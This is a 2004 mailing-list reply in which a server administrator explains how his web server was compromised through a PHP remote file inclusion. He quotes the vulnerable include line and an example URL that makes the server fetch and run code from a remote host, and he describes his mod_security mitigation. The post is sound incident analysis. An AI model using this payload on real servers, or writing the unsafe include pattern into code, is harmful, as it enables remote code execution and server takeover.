Security Incidents mailing list archives

Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)

From: "nathan c. dickerson" <nathan () pro net>
Date: Tue, 13 Jul 2004 16:31:07 -0700

Greetings!

Thanks for the reply. I am abit relieved to say I've found the point of entry via an include() injection.

The code was:
include($PAGE.".php");

On one of the custom scripts on the server.

Since remote fopen and register globals was enabled, this was injectable via passing:

index.php?page=http://remote.server.com/exploit

which expands to include("http://remote.server.com/exploit.php";)

If the remote server served the php file as plain text, the script would be included and executed. It doesn't leave any useful logs either. I've now got to find away to disable remote file includes, while keeping the remote fopen functionality, which is required by some of the scripts on the server.

Definitly going to get mod_security logging any php requests with "://" in the get, post, or even cookie.

Thanks for the replies

Nathan